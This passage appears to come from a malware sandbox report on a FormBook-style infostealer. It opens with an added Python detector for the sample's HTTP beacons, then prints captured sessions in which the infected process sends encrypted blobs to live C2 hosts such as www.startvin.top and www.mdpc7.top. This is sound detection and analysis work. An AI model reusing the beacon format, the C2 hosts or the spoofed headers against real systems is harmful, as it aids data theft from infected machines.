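Sessions 20 to 24 above show the two beacon shapes this sample sends to each host it rotates through: a POST to a short directory (/aqil/, /zffa/, /chrv/) whose body is a single form field carrying a long base64 blob, and a GET that puts the same kind of blob in the query string next to a short token (tD_=f00xUVKh). Every request carries the same User-Agent, a 2015 Mac Chrome 44 build sent from a Windows host, plus Connection: close; the POSTs also carry an Origin and Referer built from the C2 host itself although no page on that host was ever loaded. The first twelve characters of the three POST bodies (Gpc0Jx92sDXL) are identical, which is consistent with a stream cipher under a fixed key over a message with a fixed header. Two practical points: the blob must not be run through a form decoder, because '+' is part of its alphabet and parse_qs turns it into a space, and the 404 responses are simply what the sandbox saw; they do not show which of the rotated hosts is a decoy, so detection should key on the request shape. The Python below is an added example written for this page, not Joe Sandbox output or code from the sample: it parses request records like the ones in these sessions and flags that shape. The two requests are copied from sessions 21 and 20 (Accept* headers trimmed); the control request, the trait names and the four-trait threshold are assumptions of the example.

```python
"""Heuristic detector for FormBook-style HTTP beacons (added example, not sandbox output)."""
import base64
import re
from dataclasses import dataclass, field

# Exact User-Agent on every request in this report: a 2015 Mac Chrome build sent from Windows.
FORMBOOK_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36")
PATH_RE = re.compile(r"^/[a-z]{2,8}/$")             # /aqil/, /zffa/, /chrv/ above
B64_RE = re.compile(r"^[A-Za-z0-9+/]{48,}={0,2}$")   # one long opaque base64 field
# Trait names and the four-trait threshold below are assumptions of this example.


@dataclass
class HttpRequest:
    method: str
    target: str                       # path plus optional ?query
    headers: dict = field(default_factory=dict)
    body: str = ""


def parse_request(raw: str) -> HttpRequest:
    """Parse one raw HTTP/1.1 request: request line, headers, blank line, body."""
    head, _, body = raw.strip().partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body.strip())


def split_pairs(encoded: str) -> list:
    """Split k=v&k=v WITHOUT form-decoding: '+' and '/' are base64 alphabet here,
    and urllib.parse.parse_qs would silently turn every '+' into a space."""
    return [tuple(pair.partition("=")[::2]) for pair in encoded.split("&") if pair]


def formbook_indicators(req: HttpRequest) -> list:
    """Names of the beacon traits this request exhibits."""
    hits, h = [], req.headers
    path, _, query = req.target.partition("?")
    host = h.get("host", "")
    if h.get("user-agent") == FORMBOOK_UA:
        hits.append("hardcoded-ua")
    if PATH_RE.match(path):
        hits.append("short-dir-path")
    if h.get("connection", "").lower() == "close":
        hits.append("connection-close")
    if req.method == "POST":
        pairs = split_pairs(req.body)
        if (h.get("content-type") == "application/x-www-form-urlencoded"
                and len(pairs) == 1 and B64_RE.match(pairs[0][1])):
            hits.append("single-b64-form-field")
        # Origin and Referer are synthesised from the C2 host itself; no page on
        # that host was ever loaded to set them.
        if host and h.get("origin") == f"http://{host}" \
                and h.get("referer") == f"http://{host}{path}":
            hits.append("self-referencing-origin")
    elif req.method == "GET":
        pairs = split_pairs(query)
        if len(pairs) == 2 and any(B64_RE.match(v) for _, v in pairs):
            hits.append("short-token-plus-b64-query")
    return hits


def is_formbook_beacon(req: HttpRequest) -> bool:
    """UA and path shape are mandatory; two further traits are required to cut noise."""
    hits = set(formbook_indicators(req))
    return {"hardcoded-ua", "short-dir-path"} <= hits and len(hits) >= 4


def beacon_blob(req: HttpRequest) -> bytes:
    """Base64-decode the opaque field. It is ciphertext, so without the sample's key
    only its size is informative; returns b'' when no such field is present."""
    src = req.body if req.method == "POST" else req.target.partition("?")[2]
    for _, value in split_pairs(src):
        if B64_RE.match(value):
            return base64.b64decode(value + "=" * (-len(value) % 4))
    return b""


# Sessions 21 and 20 of this report, Accept* headers trimmed.
SESSION_21_POST = """POST /zffa/ HTTP/1.1
Cache-Control: no-cache
Content-Length: 220
Connection: close
Content-Type: application/x-www-form-urlencoded
Host: www.070002018.xyz
Origin: http://www.070002018.xyz
Referer: http://www.070002018.xyz/zffa/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36

0PIXBf9=Gpc0Jx92sDXLGMUv2WFGuk80i/jUu+lOpmtu2EQ7pPTvqROBXZh+0gubWs3IV/YsDrQ3rX6YWuKhuz9rtGcRQXR1dvikLxfKyhQ6yqEx6s0fAqNlgRWakHPte9M8bxFbU6qHaqViJinIbyAfP4gHrZqXaanKNkpC67ub5ALsz5CVsgCljUB1D8u3dwGy8k3I0ysOyApj1jZq7x22xQ=="""
SESSION_20_GET = """GET /aqil/?tD_=f00xUVKh&0PIXBf9=+VwoEzPaDs0s7aELp9mEitaybqlo9Ma6vB91+jO83mkKcBs1X1DQL/6P3P2ZQT9OHqbgLgcpvVmqnE/hn02MtVwUieIUVcwPPIBQaGnRdw6ZzI3y7/51wpZ1zsNtMrZa/5ef5+yRkwqf HTTP/1.1
Connection: close
Host: www.acc888ommodate.xyz
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"""
# Constructed benign control request (not from the report).
CONTROL_GET = """GET /index.html HTTP/1.1
Host: www.example.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"""
```

Run against the three records, is_formbook_beacon returns True for both report requests and False for the control; beacon_blob yields 157 bytes for the session 21 POST and 105 for the session 20 GET, the sizes of the opaque payloads once the base64 is stripped. The mandatory traits (User-Agent and path shape) are deliberately the two that a proxy log keeps even when bodies are not captured; the Origin/Referer and single-field checks need full request capture such as this report provides.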


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  25          192.168.2.7  53173        203.161.46.205  80                3736  C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Nov 18, 2024 13:14:32.937556982 CET  804                OUT        POST /chrv/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.startvin.top
                                                                  Origin: http://www.startvin.top
                                                                  Referer: http://www.startvin.top/chrv/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Raw: 30 50 49 58 42 66 39 3d 6c 6f 67 50 4d 59 65 44 56 5a 71 6f 58 33 30 63 77 4f 35 75 42 6a 79 57 5a 2b 33 43 63 48 37 32 76 57 54 30 65 46 4b 6b 69 6f 6b 73 66 6d 4d 53 66 6e 52 62 2f 7a 61 76 6d 42 35 6a 57 37 58 42 56 67 4f 55 53 43 42 56 32 71 33 38 64 33 59 4b 52 78 4a 71 6d 67 2b 47 2f 73 45 36 32 69 73 2f 56 76 4f 54 2b 45 6a 33 32 61 36 55 5a 61 2b 48 39 42 45 77 54 32 4e 53 56 67 6f 44 71 67 72 73 31 64 77 53 53 6f 2f 6d 76 62 77 4c 6e 73 4a 79 37 34 35 76 31 4f 59 32 4a 6a 41 62 45 30 6b 61 56 34 64 6e 36 7a 68 4a 62 68 41 50 41 34 72 36 6f 55 67 59 37 71 69 37 79 42 52 7a 52 69 34 5a 41 78 57 42 68 41 70 44 43 42 53 48 41 75 4d 79 30 51 3d 3d
                                                                  Data Ascii: 0PIXBf9=logPMYeDVZqoX30cwO5uBjyWZ+3CcH72vWT0eFKkioksfmMSfnRb/zavmB5jW7XBVgOUSCBV2q38d3YKRxJqmg+G/sE62is/VvOT+Ej32a6UZa+H9BEwT2NSVgoDqgrs1dwSSo/mvbwLnsJy745v1OY2JjAbE0kaV4dn6zhJbhAPA4r6oUgY7qi7yBRzRi4ZAxWBhApDCBSHAuMy0Q==
                                                                  Nov 18, 2024 13:14:33.633407116 CET  1236               IN         HTTP/1.1 404 Not Found
                                                                  Date: Mon, 18 Nov 2024 12:14:33 GMT
                                                                  Server: Apache
                                                                  Content-Length: 16052
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                  Nov 18, 2024 13:14:33.633471966 CET  1236               IN         Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                  Nov 18, 2024 13:14:33.633524895 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                  Nov 18, 2024 13:14:33.633620024 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                                  Nov 18, 2024 13:14:33.633661985 CET848INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                                  Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                                  Nov 18, 2024 13:14:33.633774042 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                                  Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
                                                                  Nov 18, 2024 13:14:33.633810043 CET1236INData Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34
                                                                  Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53
                                                                  Nov 18, 2024 13:14:33.633913994 CET424INData Raw: 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70
                                                                  Data Ascii: 39 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549"
                                                                  Nov 18, 2024 13:14:33.633948088 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                                  Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                                  Nov 18, 2024 13:14:33.633981943 CET212INData Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38
                                                                  Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linej
                                                                  Nov 18, 2024 13:14:33.638559103 CET1236INData Raw: 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 65 6c 6c 69 70 73 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 79 3d 22 34 2e 36 37 31 35 37 31 37 22 0a 20 20 20
                                                                  Data Ascii: oin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;f


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  26 | 192.168.2.7 | 53174 | 203.161.46.205 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 18, 2024 13:14:35.493324995 CET | 824 | OUT | POST /chrv/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.startvin.top
                                                                  Origin: http://www.startvin.top
                                                                  Referer: http://www.startvin.top/chrv/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=logPMYeDVZqoRWEc8P5uJjyZc+3CVn7yvWv0eHnhi6wscCcScmRb8zavpR4pLLXWVgyqSD9V2qj8d3IKRCxtmw+EqcE45Cs/VvOT+EfN2aiUZqOH8kw3PGNdUgoDugrg1dwgSr7YvYYLnoFy7MVsieYvNjBEJW4UYIV4iihfVGFlIuqYy2s0l7aA2D1FGElsCwSZsidid23tN8t2inMuD2mUvijg/chrLJqgs88=
                                                                  Nov 18, 2024 13:14:36.188283920 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Mon, 18 Nov 2024 12:14:36 GMT
                                                                  Server: Apache
                                                                  Content-Length: 16052
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  27 | 192.168.2.7 | 53175 | 203.161.46.205 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 18, 2024 13:14:38.064846992 CET | 1837 | OUT | POST /chrv/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 1252
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.startvin.top
                                                                  Origin: http://www.startvin.top
                                                                  Referer: http://www.startvin.top/chrv/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9= [TRUNCATED]
                                                                  Nov 18, 2024 13:14:38.756336927 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Mon, 18 Nov 2024 12:14:38 GMT
                                                                  Server: Apache
                                                                  Content-Length: 16052
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  28 | 192.168.2.7 | 53176 | 203.161.46.205 | 80 | 3736 | C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 18, 2024 13:14:40.610688925 CET | 541 | OUT | GET /chrv/?tD_=f00xUVKh&0PIXBf9=oqIvPuLKU6ipUF0l0s9jGwC5Rs+ISH+IiXTOUljk/btMUGhxXUhy/ROn8iRvBZThJHrBfDF95d/bLV86djItjxOaoccx9TISaPCf4hbQm/G+Yq+LkHY0VTYNMEk+ymSz3ZEiRr7ur/of HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Connection: close
                                                                  Host: www.startvin.top
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Nov 18, 2024 13:14:41.324331045 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Mon, 18 Nov 2024 12:14:41 GMT
                                                                  Server: Apache
                                                                  Content-Length: 16052
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                                                  Session ID: 29
                                                                  Source IP: 192.168.2.7
                                                                  Source Port: 53177
                                                                  Destination IP: 20.2.36.112
                                                                  Destination Port: 80
                                                                  PID: 3736
                                                                  Process: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp: Nov 18, 2024 13:14:47.588737011 CET
                                                                  Bytes transferred: 795
                                                                  Direction: OUT
                                                                  Data: POST /55tt/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 220
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.mdpc7.top
                                                                  Origin: http://www.mdpc7.top
                                                                  Referer: http://www.mdpc7.top/55tt/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=DiOeaflq1HOUSbTlSz9zFnEUP94U2NJ3Q/eL5UBHs0IAZCs/YNcw2Y6ESoY0iEPvmApwcb4TtaOVemJBoOzR4PiGuLCKjLvMCExY5/dOCzgh8eN0OgIp0baMKz4hYGPFguRf4OAAzxTaj6Gt9idG+f8l2LLawele3Klnj54WTj25+TI059ezmjqvIZHvkAgmTGfOwuy0ZJ+CfbZlZg==
                                                                  Timestamp: Nov 18, 2024 13:14:48.539200068 CET
                                                                  Bytes transferred: 336
                                                                  Direction: IN
                                                                  Data: HTTP/1.1 404 Not Found
                                                                  Content-Length: 162
                                                                  Content-Type: text/html;charset=utf-8
                                                                  Date: Mon, 18 Nov 2024 12:14:48 GMT
                                                                  Server: nginx
                                                                  X-Cache: BYPASS
                                                                  Connection: close
                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                  Session ID: 30
                                                                  Source IP: 192.168.2.7
                                                                  Source Port: 53178
                                                                  Destination IP: 20.2.36.112
                                                                  Destination Port: 80
                                                                  PID: 3736
                                                                  Process: C:\Program Files (x86)\zdATOvhgZLEUzoYVAWbESnrKLFFHmtHgndLefHqKkuSHykAxDTlkZhfAEyIUrgRVAdxASLrymSnWvi\xvYhLzczmazJ.exe
                                                                  Timestamp: Nov 18, 2024 13:14:50.135369062 CET
                                                                  Bytes transferred: 815
                                                                  Direction: OUT
                                                                  Data: POST /55tt/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.5
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 240
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: www.mdpc7.top
                                                                  Origin: http://www.mdpc7.top
                                                                  Referer: http://www.mdpc7.top/55tt/
                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                  Data Ascii: 0PIXBf9=DiOeaflq1HOUT7jlQQVzEHELAd4U/tJzQ/SL5XMCtB4AZjc/ZJAwjY6EKYY1vkPkmAVOcZsTtemVejtBo/zQ5fiEwrCItrvMCExY5/50Czoh9u90OEcqqLaTaj4hcGP7guQ84Pcuz0faj6Wt9zdJ0f8n7rK13uRQ445H55wyayyg/lJWjfSf4ySUMbjZzm9TRHbW9MGVG+boSJ4hPbK0czS0LvyH0mdGcS/eSdM=
                                                                  Timestamp: Nov 18, 2024 13:14:51.087090015 CET
                                                                  Bytes transferred: 336
                                                                  Direction: IN
                                                                  Data: HTTP/1.1 404 Not Found
                                                                  Content-Length: 162
                                                                  Content-Type: text/html;charset=utf-8
                                                                  Date: Mon, 18 Nov 2024 12:14:50 GMT
                                                                  Server: nginx
                                                                  X-Cache: BYPASS
                                                                  Connection: close
                                                                  Data Ascii: <html><head> <title>404 Not Found - webman</title></head><body><center> <h1>404 Not Found</h1></center><hr><center>webman</center></body></html>


                                                                  Session ID: 31
